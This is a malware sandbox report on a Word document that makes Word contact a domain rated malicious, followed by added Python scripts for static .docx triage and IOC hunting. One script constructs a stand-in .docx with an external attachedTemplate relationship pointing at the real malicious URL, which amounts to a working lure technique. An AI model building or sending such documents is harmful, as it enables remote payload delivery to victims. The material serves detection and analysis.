| Field | Value |
|---|---|
| File name | 334d50f3ced57bb7540f2498705f3e8897148b4d30816be8b3721c49d2d08fe7 |
| Full analysis | https://app.any.run/tasks/82bdf51d-75e2-427a-80f7-40f59dbbe9f5 |
| Verdict | Malicious activity |
| Analysis date | August 25, 2019, 12:55:24 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/octet-stream |
| File info | Microsoft OOXML |
| MD5 | DFAD7D4A7ECB2EED6D69ABFBFB5F94C9 |
| SHA1 | 88B3189A1F33A0251272C0E4ADC775E2DB3F4EE5 |
| SHA256 | 334D50F3CED57BB7540F2498705F3E8897148B4D30816BE8B3721C49D2D08FE7 |
| SSDEEP | 192:rooBVpXRqFlUbjoqn2VRwvTN81fydFQG4z2lJY26qjC+/5q:VV9RqDUbcc2VRwraQdOoJY26ubq |

| Extension | File type (TrID match score) |
|---|---|
| .docx | Word Microsoft Office Open XML Format document (41.2) |
| .zip | Open Packaging Conventions container (30.6) |
| .ubox | Universe Sandbox simulation (21) |
| .zip | ZIP compressed archive (7) |

| ZIP entry field (first entry) | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | - |
| ZipCompression | Deflated |
| ZipModifyDate | 2018:10:12 06:16:09 |
| ZipCRC | 0xeea5f986 |
| ZipCompressedSize | 355 |
| ZipUncompressedSize | 1364 |
| ZipFileName | [Content_Types].xml |

| Document property (docProps) | Value |
|---|---|
| Template | Normal.dotm |
| TotalEditTime | - |
| Pages | 1 |
| Words | 315 |
| Characters | 1802 |
| Application | Microsoft Office Word |
| DocSecurity | None |
| Lines | 15 |
| Paragraphs | 4 |
| ScaleCrop | No |
| Company | - |
| LinksUpToDate | No |
| CharactersWithSpaces | 2113 |
| SharedDoc | No |
| HyperlinksChanged | No |
| AppVersion | 12 |
| Keywords | - |
| LastModifiedBy | Charlie |
| RevisionNumber | 3 |
| CreateDate | 2018:10:11 12:14:00Z |
| ModifyDate | 2018:10:11 12:14:00Z |
| Title | - |
| Subject | - |
| Creator | Charlie |
| Description | - |

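The properties above are read from the package's docProps parts, and the requests WINWORD.EXE makes on open (see the HTTP table below) are the kind of behaviour an external relationship inside the package produces. The following script is an added example, not code from the report or from ANY.RUN. It builds a minimal stand-in .docx in memory (this is not the analysed sample, and the report does not state how the real file triggered its request; the attachedTemplate relationship pointing at the observed URL is an assumption chosen for illustration) and then triages it: lists the ZIP parts, reads the same properties the table shows, and flags every relationship whose TargetMode is External.

```python
"""Static triage of an OOXML container: list the ZIP parts, read the
docProps metadata the report tabulates, and flag every relationship with
TargetMode="External", the package feature that lets a .docx make Word
fetch a remote resource when it is opened.  Added example, not the
report's own code."""
import io
import zipfile
import xml.etree.ElementTree as ET

NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_EP = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
NS_CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
NS_DC = "http://purl.org/dc/elements/1.1/"
REL_TYPES = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# URL the sandbox saw WINWORD.EXE request (HTTP table of the report).
OBSERVED_URL = ("http://www.webserv-redir.net/images/67381F0B/-1/5272/"
                "3cdc4fcb/main.RTF")


def build_sample_docx() -> bytes:
    """Constructed stand-in, NOT the real 334d50f3... sample: a minimal .docx
    whose settings.xml.rels holds an external attachedTemplate relationship
    to OBSERVED_URL.  The report does not say which mechanism the real file
    used; this is one that yields the same kind of outbound request."""
    parts = {
        "[Content_Types].xml": (
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>'),
        "_rels/.rels": (
            f'<Relationships xmlns="{NS_REL}"><Relationship Id="rId1" '
            f'Type="{REL_TYPES}/officeDocument" Target="word/document.xml"/></Relationships>'),
        "word/document.xml": (
            f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>lure text'
            '</w:t></w:r></w:p></w:body></w:document>'),
        "word/settings.xml": (
            f'<w:settings xmlns:w="{W_NS}" xmlns:r="{REL_TYPES}">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>'),
        "word/_rels/settings.xml.rels": (
            f'<Relationships xmlns="{NS_REL}"><Relationship Id="rId1" '
            f'Type="{REL_TYPES}/attachedTemplate" Target="{OBSERVED_URL}" '
            'TargetMode="External"/></Relationships>'),
        # Property values copied from the report's document-properties table.
        "docProps/app.xml": (
            f'<Properties xmlns="{NS_EP}"><Application>Microsoft Office Word</Application>'
            '<Template>Normal.dotm</Template><AppVersion>12.0000</AppVersion></Properties>'),
        "docProps/core.xml": (
            f'<cp:coreProperties xmlns:cp="{NS_CP}" xmlns:dc="{NS_DC}">'
            '<dc:creator>Charlie</dc:creator><cp:lastModifiedBy>Charlie</cp:lastModifiedBy>'
            '<cp:revision>3</cp:revision></cp:coreProperties>'),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


def triage_docx(data: bytes) -> dict:
    """Return the part list, selected metadata and all external relationships."""
    z = zipfile.ZipFile(io.BytesIO(data))
    names = z.namelist()
    out = {"parts": names, "metadata": {}, "external": []}
    if "docProps/app.xml" in names:
        root = ET.fromstring(z.read("docProps/app.xml"))
        for tag in ("Application", "Template", "AppVersion"):
            el = root.find(f"{{{NS_EP}}}{tag}")
            if el is not None and el.text:
                out["metadata"][tag] = el.text
    if "docProps/core.xml" in names:
        root = ET.fromstring(z.read("docProps/core.xml"))
        for ns, tag in ((NS_DC, "creator"), (NS_CP, "lastModifiedBy")):
            el = root.find(f"{{{ns}}}{tag}")
            if el is not None and el.text:
                out["metadata"][tag] = el.text
    # Relationship parts can sit anywhere in the package (settings, headers,
    # footnotes, media), so walk every *.rels, not just document.xml.rels.
    for name in names:
        if not name.endswith(".rels"):
            continue
        for rel in ET.fromstring(z.read(name)).iter(f"{{{NS_REL}}}Relationship"):
            if rel.get("TargetMode") != "External":
                continue
            target = rel.get("Target", "")
            out["external"].append({
                "part": name,
                "type": rel.get("Type", "").rsplit("/", 1)[-1],
                "target": target,
                # http(s) and UNC targets are the ones Word will reach out for.
                "remote": target.lower().startswith(("http://", "https://", "\\\\")),
            })
    return out
```

Run `triage_docx(open(path, "rb").read())` against a real file; any entry in `external` whose `remote` flag is set is worth pulling apart before the document is ever opened in Word, and the `part` field tells you which feature (template, hyperlink, image, OLE object) carries the link.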
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\334d50f3ced57bb7540f2498705f3e8897148b4d30816be8b3721c49d2d08fe7.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |

| User | Company | Integrity Level | Description | Version |
|---|---|---|---|---|
| admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B79.tmp.cvr | — | — | — |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{D73BD7B1-1F8A-4780-98F8-06CF0D813810} | — | — | — |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2575BAE7-EBB6-49E2-B391-F12D501D9F7A} | — | — | — |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B53D675E-13FA-4E87-B421-988F04207777}.FSD | binary | E5353058A2EC5518C0521696523D87F8 | 242B52D08C47FF7104CC80D92C65CB8BAAA82F282A6BCB8E8E1A039CDF3C429D |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | C8844EC52F71838969834A48524C7328 | 63E66985393D853C52CB51D8977FCA9F1ABD79283ADD3A59434F08CCB7AE6489 |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8253A95.emf | emf | 1B76675B86F1433D15822E75F858338F | 7D3D98835D2C9C355B5C9F1003C18F805EB2955C7AA76A910E3BA34DE7E2EDF6 |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 0A0D31AF62C5D5CF32A1200EEAAB7A92 | 4245C829DC2746A0D44B7F2B1235F77ABFCA9525FB7BC37F4380AC844B0F5843 |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | 92EB9923F9F9D97FB8B9CA41A6D7D6BF | 69D8D61AFE8A217F6D560E856DFF124E794637267BE68486E4D20140ED6F5AF7 |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{70C0F995-6473-4D45-9CC8-8D2CC93651F9}.FSD | binary | 3287ED50AD00973B30DC72A972ED02BF | BA3D70F14FF04B2AF7517F67168C6DBAB69A210DFD7C2B6074100E34CDA82282 |
| 2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | EE9F72CD24EE377E13A4AB3028BA0E66 | C25B5B1DBC26F26057ACC5F8A87A7F793F92EBD9A9FE807FAAB887ABF1C3E6F9 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2928 | WINWORD.EXE | OPTIONS | 200 | 58.158.177.102:80 | http://www.webserv-redir.net/images/67381F0B/-1/5272/3cdc4fcb/ | JP | — | — | malicious |
2928 | WINWORD.EXE | HEAD | — | 58.158.177.102:80 | http://www.webserv-redir.net/images/67381F0B/-1/5272/3cdc4fcb/main.RTF | JP | — | — | malicious |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2928 | WINWORD.EXE | 58.158.177.102:80 | www.webserv-redir.net | UCOM Corp. | JP | malicious |

| Domain | IP | Reputation |
|---|---|---|
| www.webserv-redir.net | — | malicious |
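The HTTP, connection and DNS tables above give three things to hunt for: the IP, the domain, and the shape of the traffic (an Office process sending OPTIONS to a directory and then HEAD to a file beneath it). The script below is an added example, not code from the report or from ANY.RUN, that runs those checks over constructed telemetry: the Sysmon Event ID 3 style records and the proxy lines are made up for the demonstration, and only their IP, domain and URL values are the ones the sandbox recorded. The hostnames `sharepoint.corp.local` and `updates.example.net` and the client addresses are placeholders.

```python
"""Match the network IOCs from the report against host and proxy telemetry.
Added example, not the report's own code; every log record below is
constructed for the demonstration."""
import ipaddress
import re
from collections import defaultdict

# Indicators taken from the report's HTTP, connections and DNS tables.
IOC_DOMAINS = {"www.webserv-redir.net"}
IOC_IPS = {"58.158.177.102"}
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed Sysmon Event ID 3 (network connection) records, as a SIEM
# would forward them.  Only the first one mirrors the sandbox connection.
SYSMON_EVENTS = [
    {"EventID": 3, "ProcessId": 2928, "DestinationPort": 80,
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "DestinationIp": "58.158.177.102", "DestinationHostname": "www.webserv-redir.net"},
    {"EventID": 3, "ProcessId": 2928, "DestinationPort": 443,
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "DestinationIp": "10.0.0.20", "DestinationHostname": "sharepoint.corp.local"},
    {"EventID": 3, "ProcessId": 880, "DestinationPort": 443,
     "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "203.0.113.10", "DestinationHostname": "updates.example.net"},
]

# Constructed proxy log: timestamp client method url.  The first two lines
# reproduce the request sequence the sandbox recorded for WINWORD.EXE.
PROXY_LOG = """\
2019-08-25T12:55:40Z 10.0.0.31 OPTIONS http://www.webserv-redir.net/images/67381F0B/-1/5272/3cdc4fcb/
2019-08-25T12:55:41Z 10.0.0.31 HEAD http://www.webserv-redir.net/images/67381F0B/-1/5272/3cdc4fcb/main.RTF
2019-08-25T12:56:02Z 10.0.0.44 GET http://www.example.org/index.html
2019-08-25T12:56:10Z 10.0.0.44 OPTIONS http://www.example.org/
"""


def office_to_public(events):
    """Office binary opening a connection to a non-private address.
    High-signal on its own in most estates; the IOC match is a bonus."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 3:
            continue
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if image not in OFFICE_IMAGES:
            continue
        ip = ipaddress.ip_address(ev["DestinationIp"])
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            continue
        host = ev.get("DestinationHostname", "").lower()
        hits.append({"pid": ev["ProcessId"], "image": image, "dst": str(ip),
                     "ioc": str(ip) in IOC_IPS or host in IOC_DOMAINS})
    return hits


def options_then_head(proxy_log):
    """Flag a client that sends OPTIONS to a directory and afterwards HEAD to
    a resource beneath it: the sequence WINWORD.EXE issued in the HTTP table."""
    by_client = defaultdict(list)
    for line in proxy_log.splitlines():
        _ts, client, method, url = line.split()[:4]
        by_client[client].append((method, url))
    hits = []
    for client, reqs in by_client.items():
        for i, (method, url) in enumerate(reqs):
            if method != "OPTIONS":
                continue
            for later_method, later_url in reqs[i + 1:]:
                if later_method == "HEAD" and later_url.startswith(url):
                    host = re.match(r"https?://([^/]+)", later_url).group(1).lower()
                    hits.append({"client": client, "host": host,
                                 "resource": later_url, "ioc": host in IOC_DOMAINS})
    return hits
```

The second check deliberately fires even when the host is not on the IOC list; the `ioc` flag is what separates "this exact campaign" from "a Word document on this client just reached out for something", and the latter is usually worth a look regardless of reputation data.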